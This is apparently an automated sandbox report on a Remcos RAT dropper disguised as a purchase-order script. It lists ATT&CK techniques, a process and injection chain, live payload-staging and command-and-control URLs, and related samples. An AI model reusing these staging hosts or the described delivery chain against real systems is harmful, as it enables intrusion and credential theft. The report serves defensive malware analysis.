                      Clipboard Data                      		1
                      Remote Access Software                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading                      		Cached Domain Credentials31
                      Security Software Discovery                      		VNCGUI Input Capture2
                      Non-Application Layer Protocol                      		Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Virtualization/Sandbox Evasion                      		DCSync21
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal Capture113
                      Application Layer Protocol                      		Exfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Access Token Manipulation                      		Proc Filesystem4
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt522
                      Process Injection                      		/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575117 Sample: PO_0099822111ORDER.js Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 46 paste.ee 2->46 48 shed.dual-low.s-part-0035.t-0009.t-msedge.net 2->48 50 7 other IPs or domains 2->50 66 Suricata IDS alerts for network traffic 2->66 68 Found malware configuration 2->68 70 Malicious sample detected (through community Yara rule) 2->70 74 18 other signatures 2->74 11 wscript.exe 15 2->11         started        signatures3 72 Connects to a pastebin service (likely for C&C) 46->72 process4 dnsIp5 54 cloudinary.map.fastly.net 151.101.193.137, 443, 49710, 49711 FASTLYUS United States 11->54 42 C:\Windows\Temp\???2????4????4????5.js, ASCII 11->42 dropped 90 System process connects to network (likely due to code injection or exploit) 11->90 92 JScript performs obfuscated calls to suspicious functions 11->92 94 Suspicious powershell command line found 11->94 96 4 other signatures 11->96 16 wscript.exe 1 1 11->16         started        file6 signatures7 process8 signatures9 60 Suspicious powershell command line found 16->60 62 Wscript starts Powershell (via cmd or directly) 16->62 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 16->64 19 powershell.exe 7 16->19         started        process10 signatures11 76 Suspicious powershell command line found 19->76 78 Found suspicious powershell code related to unpacking or dynamic code loading 19->78 22 powershell.exe 14 16 19->22         started        26 conhost.exe 19->26         started        process12 dnsIp13 52 paste.ee 104.21.84.67, 443, 49719 CLOUDFLARENETUS United States 22->52 86 Writes to foreign memory regions 22->86 88 Injects a PE file into a foreign processes 22->88 28 MSBuild.exe 3 15 22->28         started        33 MSBuild.exe 22->33         started        signatures14 process15 dnsIp16 56 160.25.73.25, 49720, 49721, 6426 GIGAINFRASoftbankBBCorpJP unknown 28->56 58 geoplugin.net 178.237.33.50, 49722, 80 ATOM86-ASATOM86NL Netherlands 28->58 44 C:\ProgramData\remcos\logs.dat, data 28->44 dropped 98 Detected Remcos RAT 28->98 100 Maps a DLL or memory area into another process 28->100 102 Installs a global keyboard hook 28->102 35 MSBuild.exe 1 28->35         started        38 MSBuild.exe 1 28->38         started        40 MSBuild.exe 2 28->40         started        104 Contains functionality to bypass UAC (CMSTPLUA) 33->104 106 Tries to steal Mail credentials (via file registry) 33->106 108 Contains functionalty to change the wallpaper 33->108 110 5 other signatures 33->110 file17 signatures18 process19 signatures20 80 Tries to steal Instant Messenger accounts or passwords 35->80 82 Tries to steal Mail credentials (via file / registry access) 35->82 84 Tries to harvest and steal browser information (history, passwords, etc) 38->84

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      PO_0099822111ORDER.js15%VirustotalBrowse
                      PO_0099822111ORDER.js5%ReversingLabsWin32.Trojan.Generic

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7a0%Avira URL Cloudsafe
                      https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e80%Avira URL Cloudsafe
                      https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be70%Avira URL Cloudsafe
                      https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea80%Avira URL Cloudsafe
                      ruffella.duckdns.org100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      bg.microsoft.map.fastly.net
                      		199.232.210.172
                      		truefalse
                        		high
                        paste.ee
                        		104.21.84.67
                        		truefalse
                          		high
                          geoplugin.net
                          		178.237.33.50
                          		truefalse
                            		high
                            cloudinary.map.fastly.net
                            		151.101.193.137
                            		truefalse
                              		high
                              s-part-0035.t-0009.t-msedge.net
                              		13.107.246.63
                              		truefalse
                                		high
                                fp2e7a.wpc.phicdn.net
                                		192.229.221.95
                                		truefalse
                                  		high
                                  res.cloudinary.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgfalse
                                      		high
                                      https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_textfilefalse
                                        		high
                                        http://geoplugin.net/json.gpfalse
                                          		high
                                          https://paste.ee/r/iDcBt/0false
                                            		high
                                            ruffella.duckdns.orgtrue
                                            • Avira URL Cloud: malware
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.imvu.comrMSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		high
                                              https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgXpowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://aefd.nelreports.net/api/report?cat=bingthbhvFC84.tmp.11.drfalse
                                                  		high
                                                  http://geoplugin.net/json.gp3MSBuild.exe, 0000000A.00000002.3633339065.0000000000F43000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://analytics.paste.eepowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.nirsoft.netMSBuild.exe, 0000000B.00000002.2761597224.0000000000EF4000.00000004.00000010.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhvFC84.tmp.11.drfalse
                                                          		high
                                                          https://deff.nelreports.net/api/report?cat=msnbhvFC84.tmp.11.drfalse
                                                            		high
                                                            https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?137019cd0ea2ea141b322d7abhvFC84.tmp.11.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comMSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.compowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELbhvFC84.tmp.11.drfalse
                                                                  		high
                                                                  http://geoplugin.net/json.gp/CMSBuild.exe, 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhvFC84.tmp.11.drfalse
                                                                      		high
                                                                      https://res.cloudinary.com/wscript.exe, 00000000.00000002.2993603208.00000137F14D7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991947390.00000137F14CC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992820674.00000137F14D6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://login.yahoo.com/config/loginMSBuild.exefalse
                                                                          		high
                                                                          https://cdnjs.cloudflare.compowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdnjs.cloudflare.com;powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.nirsoft.net/MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.2940617562.00000233DC3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://secure.gravatar.compowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5c&bhvFC84.tmp.11.drfalse
                                                                                      		high
                                                                                      https://www.office.com/bhvFC84.tmp.11.drfalse
                                                                                        		high
                                                                                        https://res.cloudinary.com/dzakc3wag/raw/upload/v1734112417/uploaded_wscript.exe, 00000000.00000002.2993688674.00000137F3240000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2374286860.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991573495.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992223390.00000137F1428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993443782.00000137F1429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2991758949.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2993888591.00000137F3428000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2992154625.00000137F141B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?110eb0177c05b2ea3775fea8bhvFC84.tmp.11.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://dfa120137745023a56578a045948e58c.clo.footprintdns.com/apc/trans.gif?e2a80f8d2c945664c83931e8bhvFC84.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://www.google.com;powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://www.imvu.comMSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://aefd.nelreports.net/api/report?cat=wsbbhvFC84.tmp.11.drfalse
                                                                                                    		high
                                                                                                    https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgppowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://res.cloudinary.compowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://16f4635cf53944c2803a9fed55960f78.azr.footprintdns.com/apc/trans.gif?420dfb4adf33cca8e8445be7bhvFC84.tmp.11.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://aefd.nelreports.net/api/report?cat=bingaotbhvFC84.tmp.11.drfalse
                                                                                                            		high
                                                                                                            https://analytics.paste.ee;powershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgbhvFC84.tmp.11.drfalse
                                                                                                                		high
                                                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhvFC84.tmp.11.drfalse
                                                                                                                  		high
                                                                                                                  https://www.google.com/accounts/serviceloginMSBuild.exefalse
                                                                                                                    		high
                                                                                                                    https://aka.ms/pscore68powershell.exe, 00000004.00000002.2940617562.00000233DC3A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2940617562.00000233DC38B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2664935564.0000021680631000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://themes.googleusercontent.compowershell.exe, 00000006.00000002.2664935564.0000021680855000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.ebuddy.comMSBuild.exe, MSBuild.exe, 0000000D.00000002.2753028227.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a&bhvFC84.tmp.11.drfalse
                                                                                                                            		high
                                                                                                                            https://res.cloudinary.com/dytflt61n/image/upload/v17powershell.exe, 00000004.00000002.2940185943.00000233DC2E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high

                                                                                                                              World Map of Contacted IPs

                                                                                                                              • No. of IPs < 25%
                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                              • 75% < No. of IPs

                                                                                                                              Public IPs

                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                              151.101.193.137
                                                                                                                              		cloudinary.map.fastly.netUnited States
                                                                                                                              		54113FASTLYUSfalse
                                                                                                                              178.237.33.50
                                                                                                                              		geoplugin.netNetherlands
                                                                                                                              		8455ATOM86-ASATOM86NLfalse
                                                                                                                              104.21.84.67
                                                                                                                              		paste.eeUnited States
                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                              160.25.73.25
                                                                                                                              		unknownunknown
                                                                                                                              		17676GIGAINFRASoftbankBBCorpJPtrue

                                                                                                                              General Information

                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                              Analysis ID:1575117
                                                                                                                              Start date and time:2024-12-14 13:59:13 +01:00
                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                              Overall analysis duration:0h 7m 13s
                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                              Report type:full
                                                                                                                              Cookbook file name:default.jbs
                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                              Number of analysed new started processes analysed:15
                                                                                                                              Number of new started drivers analysed:0
                                                                                                                              Number of existing processes analysed:0
                                                                                                                              Number of existing drivers analysed:0
                                                                                                                              Number of injected processes analysed:0
                                                                                                                              Technologies:
                                                                                                                              • HCA enabled
                                                                                                                              • EGA enabled
                                                                                                                              • AMSI enabled
                                                                                                                              Analysis Mode:default
                                                                                                                              Analysis stop reason:Timeout
                                                                                                                              Sample name:PO_0099822111ORDER.js
                                                                                                                              Detection:MAL
                                                                                                                              Classification:mal100.rans.spre.phis.troj.spyw.expl.evad.winJS@18/12@3/4
                                                                                                                              EGA Information:
                                                                                                                              • Successful, ratio: 80%
                                                                                                                              HCA Information:
                                                                                                                              • Successful, ratio: 99%
                                                                                                                              • Number of executed functions: 141
                                                                                                                              • Number of non-executed functions: 309
                                                                                                                              Cookbook Comments:
                                                                                                                              • Found application associated with file extension: .js

                                                                                                                              Warnings

                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.198.119.84, 172.202.163.200, 2.22.50.131, 2.22.50.144, 192.229.221.95, 40.69.42.241, 199.232.210.172, 20.198.118.190, 20.12.23.50, 13.107.246.63
                                                                                                                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                                                                                                                              • Execution Graph export aborted for target powershell.exe, PID 7116 because it is empty
                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                              Simulations

                                                                                                                              Behavior and APIs

                                                                                                                              TimeTypeDescription
                                                                                                                              08:00:17API Interceptor73x Sleep call for process: powershell.exe modified
                                                                                                                              08:01:15API Interceptor1182108x Sleep call for process: MSBuild.exe modified

                                                                                                                              Joe Sandbox View / Context

                                                                                                                              IPs

                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              151.101.193.137NB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                                  New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                    greatnew.docGet hashmaliciousRemcosBrowse
                                                                                                                                      https://link.mail.beehiiv.com/ss/c/SFMS2DGC_3bR2eTtelyfFUzhcGs9TWsEeQw8nQp279J9B9upNohe5IND2DzRg4GfFe3uzMCkwl0VCcFF4p9tdZ71PSC4SlxBXIoR6qgai_e9KXQu46yVwLcidRn-ax90dry5wHpUbN5t2kTBuqVHtjiUR148OM6f2kzv0FbM9-j2d8Pfv1aAiA8m-jIRZ1qPGcwv7cKHtg7zS7k4vguTCgqcLvbDJq61ZPMm3FUyJbd-2ROdV-1aYJVxlO48nGuxkYE6PJ8AjBLfTrwxiX4S2X3JBdpAgH-S1qPrWFIUFnwhW_rcr9w0IZhVJg2k6UwPe0XxcmVm_hXa3Zy0nKOCBvO11zW3IuzS0wT0aqoeUGhUZL_BJAovHWU-78ta_hn0kcmqrlBzh66Yb9lBLgDUfmEypG1yBWRlXPRZ1w7redaJaooKiPuwr2V5n8bXDS9_yWg2USHIOqCrcsTtBGYogmSv3HnV9rD8TCUiXo47xhMBVMzr7StZWjjgT4kZsxK7CX-zIn8YCCC8lkjyOEp6xgdXFjETIB4df5tQm7lBbPlCZ99btsVwezxOnJZ4MV1piJOH9CONfmhGD5405v_OGQ0ddDY5d31qqadrUj9T5uo/422/2hUrqrZHQZSMSqb_7MA2RQ/h1/bXAkiKjrMazQzzpENtDvosiaH2ZRcmZd0aMxcbDunvMGet hashmaliciousUnknownBrowse
                                                                                                                                        https://www.searchunify.comGet hashmaliciousUnknownBrowse
                                                                                                                                          178.237.33.50requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp
                                                                                                                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • geoplugin.net/json.gp

                                                                                                                                          Domains

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          cloudinary.map.fastly.netNB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 151.101.129.137
                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                                                          • 151.101.193.137
                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          invoice09850.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 151.101.65.137
                                                                                                                                          Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 151.101.1.137
                                                                                                                                          bg.microsoft.map.fastly.netPAYMENT COPY_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          xu27D0L6Ak.exeGet hashmaliciousDCRatBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          FW_ TBI Construction Company.emlGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          cv.docmGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.214.172
                                                                                                                                          rsIMIwPUAU.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          CwsM6q5l8O.docGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          5XrJcH26DG.docxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          UKBHxdhIyJ.docxGet hashmaliciousSidewinderBrowse
                                                                                                                                          • 199.232.210.172
                                                                                                                                          paste.eeNB PO-104105107108.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.96.6
                                                                                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                                                          • 172.67.187.200
                                                                                                                                          creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          Cot90012ARCACONTAL.xlsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 188.114.97.6
                                                                                                                                          SOA USD67,353.35.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.97.6
                                                                                                                                          Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                          • 188.114.96.6
                                                                                                                                          print preview.jsGet hashmaliciousFormBookBrowse
                                                                                                                                          • 172.67.187.200
                                                                                                                                          nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          nicewithgreatfeaturesreturnformebestthingsgivensoofar.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 104.21.84.67
                                                                                                                                          geoplugin.netrequests-pdf.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          x295IO8kqM.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          7d74ApV4bb.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          4JwhvqLe8n.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          fIPSLgT0lO.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50
                                                                                                                                          IXCbn4ZcdS.exeGet hashmaliciousRemcosBrowse
                                                                                                                                          • 178.237.33.50

                                                                                                                                          ASNs

                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                          FASTLYUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                          • 151.101.193.91
                                                                                                                                          https://www.google.co.ao/url?Obdy=ObM8wNGVUva21gnTm3qS&cgsr=7knoOQwChvIkzgfn0TSm&sa=t&wofc=nQYL5DF797O1da77PTBQ&url=amp%2Fprimer-distrito-amvt.org%2F.r%2F7T2aAE-SUREDANNYWthbnNoYS5rYW5vZGlhQGx0aW1pbmR0cmVlLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                          • 151.101.66.137
